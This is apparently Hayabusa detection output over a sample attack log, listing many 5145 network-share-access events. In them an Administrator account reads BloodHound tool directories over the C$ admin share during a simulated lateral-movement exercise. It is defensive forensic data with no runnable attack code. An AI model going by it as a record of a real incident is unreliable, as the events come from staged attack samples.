0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server | 
IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components | 
